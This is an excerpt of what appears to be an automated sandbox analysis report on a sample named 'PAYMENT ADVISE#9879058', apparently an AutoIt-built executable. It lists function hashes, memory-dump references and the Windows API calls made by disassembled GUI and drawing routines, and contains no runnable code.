                          • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                          • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                          • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                          • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                          Function 00412818 Relevance: .4, Instructions: 378COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                          • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                          • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                          • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                          Function 0041240C Relevance: .4, Instructions: 361COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                          • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                          • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                          • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                          Function 00412038 Relevance: .4, Instructions: 351COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                          • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                          • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                          • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                          Function 00490D70 Relevance: .1, Instructions: 114COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd4b6b4ad385efb8df4e86150e12b6ed5af029a15170f639b1c0968fe0c2746e
                          • Instruction ID: d3c0e48af9ae2c70c07a2e6cf84ba261ef26697eff6fd8a661c12f748b1e0f6f
                          • Opcode Fuzzy Hash: bd4b6b4ad385efb8df4e86150e12b6ed5af029a15170f639b1c0968fe0c2746e
                          • Instruction Fuzzy Hash: 0441456544E7C04FCB138BB888B5AA27FB0AE07214B5F44DBC5C5CF4B3D658994ACB22
                          Function 03FAAE60 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction ID: 13c59102b4bcd93326db75b5b84fc85828ee157208eae40550288ca39eacc396
                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction Fuzzy Hash: 7541C4B1D1091CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
                          Function 03FAACF0 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction ID: 82c92d33f262b0358b21feb1176acf95657b5265a99180bbbd065bc46923ce22
                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction Fuzzy Hash: 23018078A10609EFCB44DF98C5909AEF7B5FF48210B208599D819AB301D730AE41DB90
                          Function 03FAAD50 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction ID: b8beb7fbf1232a88702375b7075d946a318b5b74ea02987cdd9b949a7b2bb796
                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction Fuzzy Hash: EF0180B8A10609EFCB44DF98C5909AEF7F5FB48310B208599D819A7701E730AE41DB80
                          Function 00410D10 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                          • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                          • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                          • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                          Function 03FA96C0 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1738858530.0000000003FA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3fa7000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                          Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(?), ref: 004593D7
                          • DeleteObject.GDI32(?), ref: 004593F1
                          • DestroyWindow.USER32(?), ref: 00459407
                          • GetDesktopWindow.USER32 ref: 0045942A
                          • GetWindowRect.USER32(00000000), ref: 00459431
                          • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                          • GetClientRect.USER32(00000000,?), ref: 004595C8
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                          • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                          • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                          • GlobalLock.KERNEL32(00000000), ref: 00459668
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                          • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                          • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                          • GlobalFree.KERNEL32(00000000), ref: 004596C0
                          • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                          • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                          • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                          • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                          • GetStockObject.GDI32(00000011), ref: 004597B7
                          • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                          • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                          • DeleteDC.GDI32(00000000), ref: 004597E1
                          • _wcslen.LIBCMT ref: 00459800
                          • _wcscpy.LIBCMT ref: 0045981F
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                          • GetDC.USER32(?), ref: 004598DE
                          • SelectObject.GDI32(00000000,?), ref: 004598EE
                          • SelectObject.GDI32(00000000,?), ref: 00459919
                          • ReleaseDC.USER32(?,00000000), ref: 00459925
                          • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 4040870279-2373415609
                          • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                          • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                          • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                          • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                          Function 00441E05 Relevance: 49.8, APIs: 33, Instructions: 276COMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00441E64
                          • SetTextColor.GDI32(?,?), ref: 00441E6C
                          • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                          • GetSysColor.USER32(0000000F), ref: 00441E8F
                          • SetBkColor.GDI32(?,?), ref: 00441EAA
                          • SelectObject.GDI32(?,?), ref: 00441EBA
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                          • GetSysColor.USER32(00000010), ref: 00441EF8
                          • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                          • FrameRect.USER32(?,?,00000000), ref: 00441F10
                          • DeleteObject.GDI32(?), ref: 00441F1B
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                          • FillRect.USER32(?,?,?), ref: 00441FB6
                            • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                            • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                            • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                            • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                            • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                            • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                            • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                            • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                            • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                            • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                            • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                            • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                            • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                          • String ID:
                          • API String ID: 69173610-0
                          • Opcode ID: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                          • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                          • Opcode Fuzzy Hash: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                          • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                          Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-3360698832
                          • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                          • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                          • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                          • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                          Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(0000000E), ref: 00433D81
                          • SetTextColor.GDI32(?,00000000), ref: 00433D89
                          • GetSysColor.USER32(00000012), ref: 00433DA3
                          • SetTextColor.GDI32(?,?), ref: 00433DAB
                          • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                          • GetSysColor.USER32(0000000F), ref: 00433DCB
                          • CreateSolidBrush.GDI32(?), ref: 00433DD4
                          • GetSysColor.USER32(00000011), ref: 00433DEB
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                          • SelectObject.GDI32(?,00000000), ref: 00433E0D
                          • SetBkColor.GDI32(?,?), ref: 00433E19
                          • SelectObject.GDI32(?,?), ref: 00433E29
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                          • GetWindowLongW.USER32 ref: 00433E8A
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                          • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                          • DrawFocusRect.USER32(?,?), ref: 00433F1F
                          • GetSysColor.USER32(00000011), ref: 00433F2E
                          • SetTextColor.GDI32(?,00000000), ref: 00433F36
                          • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                          • SelectObject.GDI32(?,?), ref: 00433F63
                          • DeleteObject.GDI32(?), ref: 00433F70
                          • SelectObject.GDI32(?,?), ref: 00433F78
                          • DeleteObject.GDI32(00000000), ref: 00433F7B
                          • SetTextColor.GDI32(?,?), ref: 00433F83
                          • SetBkColor.GDI32(?,?), ref: 00433F8F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1582027408-0
                          • Opcode ID: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                          • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                          • Opcode Fuzzy Hash: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                          • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                          Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00456692
                          • GetDesktopWindow.USER32 ref: 004566AA
                          • GetWindowRect.USER32(00000000), ref: 004566B1
                          • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                          • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                          • DestroyWindow.USER32(?), ref: 00456731
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                          • IsWindowVisible.USER32(?), ref: 00456812
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                          • GetWindowRect.USER32(?,?), ref: 0045685C
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                          • GetMonitorInfoW.USER32 ref: 00456894
                          • CopyRect.USER32(?,?), ref: 004568A8
                          • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                          • String ID: ($,$tooltips_class32
                          • API String ID: 541082891-3320066284
                          • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                          • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                          • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                          • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                          Function 00454DAA Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 203windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00454DCF
                          • _wcslen.LIBCMT ref: 00454DE2
                          • __wcsicoll.LIBCMT ref: 00454DEF
                          • _wcslen.LIBCMT ref: 00454E04
                          • __wcsicoll.LIBCMT ref: 00454E11
                          • _wcslen.LIBCMT ref: 00454E24
                          • __wcsicoll.LIBCMT ref: 00454E31
                            • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                          • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                          • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                          • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                          • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                          • DestroyIcon.USER32(?), ref: 00454FA2
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
